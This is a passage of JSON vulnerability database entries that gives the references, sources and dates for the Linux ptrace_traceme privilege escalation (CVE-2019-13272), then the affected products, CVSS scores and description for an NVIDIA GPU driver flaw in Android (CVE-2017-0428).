        "id": "JVNDB-2019-006727"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-13272"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=1903"
      },
      {
        "trust": 2.4,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1730895"
      },
      {
        "trust": 2.4,
        "url": "https://bugzilla.suse.com/show_bug.cgi?id=1140671"
      },
      {
        "trust": 2.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13272"
      },
      {
        "trust": 2.2,
        "url": "http://packetstormsecurity.com/files/165051/linux-kernel-5.1.x-ptrace_traceme-pkexec-local-privilege-escalation.html"
      },
      {
        "trust": 2.2,
        "url": "http://packetstormsecurity.com/files/153663/linux-ptrace_traceme-broken-permission-object-lifetime-handling.html"
      },
      {
        "trust": 2.2,
        "url": "http://packetstormsecurity.com/files/156929/linux-ptrace_traceme-local-root.html"
      },
      {
        "trust": 2.2,
        "url": "https://www.debian.org/security/2019/dsa-4484"
      },
      {
        "trust": 2.2,
        "url": "http://packetstormsecurity.com/files/153702/slackware-security-advisory-slackware-14.2-kernel-updates.html"
      },
      {
        "trust": 2.2,
        "url": "https://lists.debian.org/debian-lts-announce/2019/07/msg00023.html"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2019:2411"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2019:2405"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2019:2809"
      },
      {
        "trust": 1.6,
        "url": "http://packetstormsecurity.com/files/154957/linux-polkit-pkexec-helper-ptrace_traceme-local-root.html"
      },
      {
        "trust": 1.6,
        "url": "https://security.netapp.com/advisory/ntap-20190806-0001/"
      },
      {
        "trust": 1.6,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.1.17"
      },
      {
        "trust": 1.6,
        "url": "https://support.f5.com/csp/article/k91025336"
      },
      {
        "trust": 1.6,
        "url": "https://lists.debian.org/debian-lts-announce/2019/07/msg00022.html"
      },
      {
        "trust": 1.6,
        "url": "https://seclists.org/bugtraq/2019/jul/30"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4094-1/"
      },
      {
        "trust": 1.6,
        "url": "https://seclists.org/bugtraq/2019/jul/33"
      },
      {
        "trust": 1.6,
        "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6994eefb0053799d2e07cd140df6c2ea106c41ee"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4117-1/"
      },
      {
        "trust": 1.6,
        "url": "https://github.com/torvalds/linux/commit/6994eefb0053799d2e07cd140df6c2ea106c41ee"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4093-1/"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4095-1/"
      },
      {
        "trust": 1.6,
        "url": "http://packetstormsecurity.com/files/154245/kernel-live-patch-security-notice-lsn-0054-1.html"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4118-1/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ogrk5lywbj4e4sri4dkx367nhysi3voh/"
      },
      {
        "trust": 1.0,
        "url": "https://support.f5.com/csp/article/k91025336?utm_source=f5support\u0026amp%3butm_medium=rss"
      },
      {
        "trust": 0.9,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-13272"
      },
      {
        "trust": 0.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ogrk5lywbj4e4sri4dkx367nhysi3voh/"
      },
      {
        "trust": 0.6,
        "url": "https://support.f5.com/csp/article/k91025336?utm_source=f5support\u0026utm_medium=rss"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192984-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00237.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193255-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193252-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193249-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193248-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193247-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193258-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193260-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193261-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193263-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20193246-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192953-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192952-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192951-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192950-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192949-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192948-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192947-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192946-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2704/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2749/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4646/"
      },
      {
        "trust": 0.6,
        "url": "https://support.lenovo.com/us/en/product_security/len-29592"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4346/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4252/"
      },
      {
        "trust": 0.6,
        "url": "https://www.exploit-db.com/exploits/50541"
      },
      {
        "trust": 0.6,
        "url": "https://www.exploit-db.com/exploits/47133"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-privilege-escalation-via-ptrace-link-29820"
      },
      {
        "trust": 0.6,
        "url": "https://www.exploit-db.com/exploits/47163"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/153663/linux-ptrace/traceme-broken-permission-object-lifetime-handling.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4346.2/"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-1125"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10126"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3846"
      },
      {
        "trust": 0.3,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-13272"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11599"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-12614"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-1125"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/articles/4329821"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13233"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-12984"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1054.61"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4095-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-159.187"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1122.128"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1090.101"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1118.127"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5383"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4093-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.0.0-1013.14"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1013.13"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/5.0.0-25.26~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/5.0.0-1018.19"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/5.0.0-1014.14"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1014.14~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.0.0-25.26"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1014.14"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/linux"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10638"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4117-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3900"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14284"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14283"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1014.16"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-16597"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-3892"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10126"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16597"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com"
      },
      {
        "trust": 0.1,
        "url": "http://osuosl.org)"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3892"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-11599"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com/gpg-key"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-3846"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5489"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-6974"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-6974"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-5489"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-006727"
      },
      {
        "db": "PACKETSTORM",
        "id": "154044"
      },
      {
        "db": "PACKETSTORM",
        "id": "153972"
      },
      {
        "db": "PACKETSTORM",
        "id": "154045"
      },
      {
        "db": "PACKETSTORM",
        "id": "153699"
      },
      {
        "db": "PACKETSTORM",
        "id": "153970"
      },
      {
        "db": "PACKETSTORM",
        "id": "154316"
      },
      {
        "db": "PACKETSTORM",
        "id": "153702"
      },
      {
        "db": "PACKETSTORM",
        "id": "154553"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-809"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-13272"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2019-13272"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-006727"
      },
      {
        "db": "PACKETSTORM",
        "id": "154044"
      },
      {
        "db": "PACKETSTORM",
        "id": "153972"
      },
      {
        "db": "PACKETSTORM",
        "id": "154045"
      },
      {
        "db": "PACKETSTORM",
        "id": "153699"
      },
      {
        "db": "PACKETSTORM",
        "id": "153970"
      },
      {
        "db": "PACKETSTORM",
        "id": "154316"
      },
      {
        "db": "PACKETSTORM",
        "id": "153702"
      },
      {
        "db": "PACKETSTORM",
        "id": "154553"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-809"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-13272"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-07-17T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-13272"
      },
      {
        "date": "2019-07-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-006727"
      },
      {
        "date": "2019-08-13T17:45:06",
        "db": "PACKETSTORM",
        "id": "154044"
      },
      {
        "date": "2019-08-07T20:11:10",
        "db": "PACKETSTORM",
        "id": "153972"
      },
      {
        "date": "2019-08-13T17:45:15",
        "db": "PACKETSTORM",
        "id": "154045"
      },
      {
        "date": "2019-07-20T19:11:11",
        "db": "PACKETSTORM",
        "id": "153699"
      },
      {
        "date": "2019-08-07T20:10:41",
        "db": "PACKETSTORM",
        "id": "153970"
      },
      {
        "date": "2019-09-02T23:48:33",
        "db": "PACKETSTORM",
        "id": "154316"
      },
      {
        "date": "2019-07-22T09:32:22",
        "db": "PACKETSTORM",
        "id": "153702"
      },
      {
        "date": "2019-09-20T15:08:09",
        "db": "PACKETSTORM",
        "id": "154553"
      },
      {
        "date": "2019-07-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201907-809"
      },
      {
        "date": "2019-07-17T13:15:10.687000",
        "db": "NVD",
        "id": "CVE-2019-13272"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-13272"
      },
      {
        "date": "2019-07-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-006727"
      },
      {
        "date": "2021-11-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201907-809"
      },
      {
        "date": "2023-11-07T03:03:48.947000",
        "db": "NVD",
        "id": "CVE-2019-13272"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "154045"
      },
      {
        "db": "PACKETSTORM",
        "id": "153699"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-809"
      }
    ],
    "trust": 0.8
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel Vulnerabilities related to authorization, permissions, and access control",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-006727"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control issues",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-809"
      }
    ],
    "trust": 0.6
  }
}

var-201702-0744
Vulnerability from variot

An elevation of privilege vulnerability in the NVIDIA GPU driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device. Product: Android. Versions: Kernel-3.10. Android ID: A-32401526. References: N-CVE-2017-0428. GoogleNexus9 is a tablet from Google Inc. in the United States. NVIDIA GPUDrivers is a graphics processor driver. Google Nexus is prone to multiple privilege-escalation vulnerabilities. These issues are being tracked by Android Bug IDs A-32401526 and A-32636619

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201702-0744",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "android",
        "scope": null,
        "trust": 1.4,
        "vendor": "google",
        "version": null
      },
      {
        "model": "android",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "google",
        "version": "7.1.1"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "9"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "7.1.1"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01589"
      },
      {
        "db": "BID",
        "id": "96070"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001502"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0428"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-305"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:google:android:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "7.1.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0428"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Yuan-Tsung Lo, Tong Lin, Chiachih Wu ( @chiachih_wu), and Xuxian Jiang of C0RE Team and Xiaodong Wang.",
    "sources": [
      {
        "db": "BID",
        "id": "96070"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2017-0428",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.6,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 9.3,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2017-0428",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2017-01589",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-0428",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-0428",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-01589",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201702-305",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-0428",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01589"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0428"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001502"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0428"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-305"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An elevation of privilege vulnerability in the NVIDIA GPU driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device. Product: Android. Versions: Kernel-3.10. Android ID: A-32401526. References: N-CVE-2017-0428. GoogleNexus9 is a tablet from Google Inc. in the United States. NVIDIA GPUDrivers is a graphics processor driver. Google Nexus is prone to multiple privilege-escalation vulnerabilities. \nThese issues are being tracked by Android Bug IDs A-32401526 and A-32636619",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0428"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001502"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01589"
      },
      {
        "db": "BID",
        "id": "96070"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0428"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-0428",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "96070",
        "trust": 2.6
      },
      {
        "db": "SECTRACK",
        "id": "1037798",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001502",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01589",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-305",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0428",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01589"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0428"
      },
      {
        "db": "BID",
        "id": "96070"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001502"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0428"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-305"
      }
    ]
  },
  "id": "VAR-201702-0744",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
